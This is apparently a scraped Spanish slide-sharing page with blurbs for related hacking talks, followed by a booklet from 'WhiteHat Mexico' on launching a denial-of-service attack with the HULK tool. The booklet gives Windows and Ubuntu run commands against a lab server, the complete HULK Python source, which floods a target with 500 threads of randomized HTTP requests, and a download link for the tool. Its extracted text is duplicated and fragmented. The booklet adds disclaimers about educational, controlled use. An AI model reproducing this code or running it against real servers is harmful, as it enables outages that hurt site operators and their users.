El documento describe un libro sobre hacking ético que incluye instrucciones para realizar ataques de denegación de servicio (DoS) controlados contra servidores web con el programa Python Hulk. Explica cómo instalar Python e implementar el ataque en Windows y Linux, advirtiendo que los ejemplos son solo con fines educativos y no deben usarse para dañar sistemas ajenos.
Manual de Seguridad Informatica sobre Ataque Web LOICWhite Hat Mexico
Manual de seguridad sobre ataque web con Anonymous Loic.
Autor: Carlos Alberto Castruita Rodriguez
Director de WhiteHat Mexico
http://www.whitehatmexico.tk
http://www.whitehatmexico.com.mx
Whatsapp: 442 146 7512
Manual de Seguridad Informatica sobre Ataque Web LOICWhite Hat Mexico
Manual de seguridad sobre ataque web con Anonymous Loic.
Autor: Carlos Alberto Castruita Rodriguez
Director de WhiteHat Mexico
http://www.whitehatmexico.tk
http://www.whitehatmexico.com.mx
Whatsapp: 442 146 7512
presentación sobre los riesgos y las amenazas dela información requisito de la materia Seguridad Informática del séptimo semestre en el Politécnico Santiago Mariño
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
Este webinar expone detalladamente, el procedimiento de como utilizando la distribución orientada a realizar pruebas de penetración y auditorías de seguridad,de nombre Kali Linux; y puntualmente una de las herramientas más poderosas para realizar auditorías de seguridad, la cual posibilita crear y ejecutar exploits de nombre Metasploit Framework; es factible crear un archivo infectado para tomar control remoto de un servidor.
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Jose Gonzales
Si les apasiona el mundo del Pentesting, esta presentación le permite entender de cómo los Hackers Maliciosos aplican técnicas avanzadas para poder Hackear aplicaciones web. Y poder tener control total de los recursos que contiene los Servidores Web en el mundo real.
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
Las amenazas en Internet están más latentes que nunca. Hoy en día la materialización de una amenaza en la vida de los usuarios y las empresas pueden provocar una gran destrucción, pero, ¿Es sencillo? La publicación de vulnerabilidades y de técnicas de pentesting provocan que cualquier usuario puedan aprovecharlas para integrarlas en un nuevo malware.
En la charla se detallará cómo de fácil es modular, por un bad boy, un malware a través de vulnerabilidades y técnicas publicadas en el último año. La técnica Fileless & Fileless2 para hacer bypass UAC o crear persistencia en Windows sin crear un archivo en disco ya ha sido utilizada en campañas de malware. La vulnerabilidad Eternalblue ha sido aprovechada para propagar malware a través del protocolo SMB. La lacra del ransomware sigue siendo utilizada para obtener un beneficio directo y, hoy en día, cualquier usuario puede modularizar las partes y hacer un malware más potente, ¿Estamos preparados para luchar contra esto? Detallaremos de forma técnica y práctica los conceptos comentados anteriormente.
Por último, hablaremos de la transición de la sociedad. La nueva sociedad que viene debe estar preparada para entender y luchar contra las nuevas amenazas cibernéticas. Los casos de la Botnet Mirai o del Ransomware Petya son claros ejemplos de que la sociedad debe entender y asimilar un nuevo rol. ¿Estás en la nueva sociedad?
• Siempre pensamos que a nosotros "eso no nos va a pasar", que estamos a salvo, o que no tenemos nada que esconder.
• Quien no ha oído eso de "bueno, si me hackean mi correo no pasa nada, no tengo nada que esconder". Bien, en esta charla comprobaremos que realmente sí importa. Veremos un caso real de como simplemente comprometiendo un router domestico pueden llegar a obtener diversas contraseñas, acceso a discos multimedia, impresoras o incluso a cámaras vigila bebés.
• Nadie está a salvo, eres más hackeable de lo que crees.
• Siempre pensamos que a nosotros "eso no nos va a pasar", que estamos a salvo, o que no tenemos nada que esconder.
• Quien no ha oído eso de "bueno, si me hackean mi correo no pasa nada, no tengo nada que esconder". Bien, en esta charla comprobaremos que realmente sí importa. Veremos un caso real de como simplemente comprometiendo un router domestico pueden llegar a obtener diversas contraseñas, acceso a discos multimedia, impresoras o incluso a cámaras vigila bebés.
• Nadie está a salvo, eres más hackeable de lo que crees.
Clases de Informática primaria para niños de colegios católicos
Manual de pentesting_sobre_ataque_web_python_hulk
1. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 1
3. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 3
Descubre desde cero como es Arte del Hacking de una visión de un White Hat.
El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de
vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un
nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o
soporte técnico en sistemas.
Autor: Carlos Alberto Castruita Rodríguez
Director de WhiteHat - México
Con 20 años de experiencia en el área sistemas.
Certificado Hellermann Tyton
Certificado 3com Networks
Ethical Hacker Certificado
Contacto: carlos.castruita@whitehatmexico.tk
4. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 4
ATAQUE A SERVIDORES WEB
“ HULK ”
Ataque de denegación de servicio con
Python Hulk
Se trata de un cliente HTTP capaz de provocar una denegación de servicio (DoS) a
servidores web con poco uso de ancho de banda.
Dicho cliente HTTP intenta abrir tantas conexiones como pueda al servidor web e intenta
mantenerlas abiertas tanto tiempo como sea posible. Periódicamente para evitar que el
servidor web cierre la conexión va añadiendo headers a la petición HTTP sin llegar a
finalizarla nunca.
Vamos a realizar un ataque controlado ya que si atacamos un servidor establecido
incurriremos en un delito.
Levante un servidor con IIS y monte el WampServer para poner una simple página web
hecha en WordPress.
5. Libro de Et
Contacto: whitehat.mexico@gmail.com
Nuestro servidor web tiene la siguiente IP 192.168.0.100
Lo verificamos con el comando ipconfig
El ataque lo haremos con una versión viejita de Python la versión 2.7
Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.
Acezamos al folder de Python desde modo Dos.
Python 2.7 lo puedes descargar de GRATIS al final de la explicación.
Hulk descárgalo igual al final de este mismo.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
@gmail.com
Nuestro servidor web tiene la siguiente IP 192.168.0.100
Lo verificamos con el comando ipconfig
os con una versión viejita de Python la versión 2.7.5
Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.
al folder de Python desde modo Dos.
escargar de GRATIS al final de la explicación.
descárgalo igual al final de este mismo.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 5
Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.
6. Libro de Et
Contacto: whitehat.mexico@gmail.com
SINTAXIS: python.exe
>> ESCRIBIR: python.exe
Y ahora si prepárense, por que el servidor WEB se va a colapsar.
Haremos el mismo ejerció en Linux.
En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja
Ubuntu y después seleccionamos la opción
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
@gmail.com
python.exe hulk.py <Url>
python.exe hulk.py http://192.168.0.100 { INTRO }
Y ahora si prepárense, por que el servidor WEB se va a colapsar.
en Linux.
En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja
Ubuntu y después seleccionamos la opción Herramienta para Desarrolladores.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 6
{ INTRO }
En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja
Herramienta para Desarrolladores.
7. Libro de Et
Contacto: whitehat.mexico@gmail.com
Ahora escogemos Python y lo instalamos.
Ya instalado el Python abrimos una
El archivo Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el
archivo.
Usaremos la misma sintaxis que usamos dentro de Windows.
SINTAXIS: python.exe
>> ESCRIBIR: python.exe
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
@gmail.com
escogemos Python y lo instalamos.
Ya instalado el Python abrimos una terminal, recuerda que se abre con CTRL+ALT+
Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el
la misma sintaxis que usamos dentro de Windows.
python.exe hulk.py <Url>
python.exe hulk.py http://192.168.0.100 { INTRO }
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 7
terminal, recuerda que se abre con CTRL+ALT+T.
Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el
{ INTRO }
8. Libro de Et
Contacto: whitehat.mexico@gmail.com
Ahora nos aparecerá el letrero
El ataque se ha iniciado y dejaremos que se envíen las peticiones al server.
NOTA IMPORTANTE:
Estos ejercicios de ataques son
entidad gubernamental, son ataques 100% controlados.
Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos.
Yo como escritor e investigador de técnicas de ataque a medios
uno de mis ejercicios de ataques a redes, servidores, equipos
son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros.
Expongo los ejercicios que yo como técnico
dejo visto como un Black Hacker puede atacar un equipo electrónico.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
@gmail.com
Ahora nos aparecerá el letrero – HULK Attack Started –
El ataque se ha iniciado y dejaremos que se envíen las peticiones al server.
Estos ejercicios de ataques son con fines didácticos y no atacamos a ninguna empresa ni
entidad gubernamental, son ataques 100% controlados.
Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos.
Yo como escritor e investigador de técnicas de ataque a medios informáticos
uno de mis ejercicios de ataques a redes, servidores, equipos informáticos
son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros.
Expongo los ejercicios que yo como técnico informático a mi persona me han funcionado y
dejo visto como un Black Hacker puede atacar un equipo electrónico.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 8
El ataque se ha iniciado y dejaremos que se envíen las peticiones al server.
con fines didácticos y no atacamos a ninguna empresa ni
Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos.
informáticos, que cada
informáticos y telefónicos
son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros.
a mi persona me han funcionado y
9. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 9
Anexo copia del código fuente de Hulk desarrollado por Barry Shteiman
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author : Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
10. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 10
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET
CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
(.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko)
Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR
2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727;
InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
11. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 11
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py <url>'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
12. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 12
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
13. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 13
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "n-- HULK Attack Finished --"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
14. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 14
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
Es muy fácil entender la lógica de funcionamiento del código y uno puede hasta hacerle
mejoras al mismo código pero como indica el mismo autor del mismo que es un delito el
uso malicioso para ataque DOS.
15. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat.mexico@gmail.com Página 15
BONUS
Descargas de Software libre de Compra de Licencia.
WhiteHat México tiene esas aplicaciones en la nube, listas para descargar.
WINDOWS:
• Python 2.7.5
URL:
QR:
• Hulk
URL:
https://mega.co.nz/#!OIpCDTgA!ikGOVC833_Y0nGtVsgXJPqmjfvcpqpNj19yjdVrdS80
QR: